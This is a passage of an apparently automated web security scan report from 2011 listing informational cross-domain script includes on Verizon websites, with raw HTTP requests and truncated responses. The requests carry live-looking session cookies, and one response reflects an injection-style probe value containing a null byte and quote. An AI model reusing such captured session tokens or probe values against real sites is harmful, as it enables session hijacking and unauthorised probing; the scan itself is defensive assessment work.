Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "343cd25e06471fded4613ae60450d2ab"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 24141
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:42 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.47. http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/sign-in/vec/wan.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Medium/sign-in/vec/wan.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262282|VP%3d3|RMC%3dxg|LP%3den; sifrFetch=true; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.5.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:52 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "1ae63ef34043aa573ff4ad6621f7d0f9"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23155
Date: Mon, 05 Sep 2011 22:22:53 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:52 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.48. http://www.verizonbusiness.com/about/ipinnovation/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /about/ipinnovation/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/ipinnovation/ HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279065.2; __utmb=58777642.1.10.1315279065; __utmc=58777642; __utmz=58777642.1315279065.2.2.utmcsr=search|utmccn=(organic)|utmcmd=organic|utmctr=wss

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "2cc42523912f8dd3e6e8f7da028c3456"
Last-Modified: Mon, 05 Sep 2011 22:18:16 GMT
Vary: *
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 28468
Date: Mon, 05 Sep 2011 22:18:17 GMT
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262296|VP%3d3|RMC%3dxg|LP%3den%00568ab"%3b816280f424; expires=Mon, 05 Sep 2016 03:22:00 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:18:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.49. http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.7.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "5eff3d3484488f3a491f0ebee89e9e2b"
Last-Modified: Mon, 05 Sep 2011 22:18:11 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 33927
Date: Mon, 05 Sep 2011 22:18:11 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:18:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.50. http://www.verizonbusiness.com/us/Products/networking/internet/ipv6/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /us/Products/networking/internet/ipv6/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /us/Products/networking/internet/ipv6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "7ccf9e359df2b6054bf13169efbf9ab9"
Last-Modified: Mon, 05 Sep 2011 22:37:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Mon, 05 Sep 2011 22:37:04 GMT
Content-Length: 27349
Connection: close
Set-Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315263423|VP%3d60|RMC%3dxg|LP%3den; expires=Mon, 05 Sep 2016 03:40:47 GMT; domain=www.verizonbusiness.com; path=/
Expires: Sun, 05 Sep 2010 16:37:04 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=vzbdotcom"></script>
...[SNIP]...

16.51. http://www.verizonwireless.com/b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=1&lid=//hp//p//100+Trade+In//Imp&hid=0.07034434005618095 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:04 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.52. http://www.verizonwireless.com/b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=10&lid=//hp//tnt//DROID%20Bionic%20by%20Motorola//Imp&hid=0.7112846237141639 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.53. http://www.verizonwireless.com/b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=11&lid=//hp//p//100+Trade+In//Imp&hid=0.3314754036255181 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; CP=null*; mbox=session#1315278939788-568601#1315280864|PC#1315278939788-568601.19#1316488604|check#true#1315279064; mybizCookie=true

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.54. http://www.verizonwireless.com/b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=2&lid=//hp//p//Labor+Day+Sale//Imp&hid=0.8891192970331758 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:08 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.55. http://www.verizonwireless.com/b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=3&lid=//hp//p//Deals+Central//Imp&hid=0.5899386655073613 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:12 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
Content-Length: 14954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:la
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

16.56. http://www.verizonwireless.com/b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/&hec=4&lid=//hp//p//Back+To+School//Imp&hid=0.734757476951927 HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
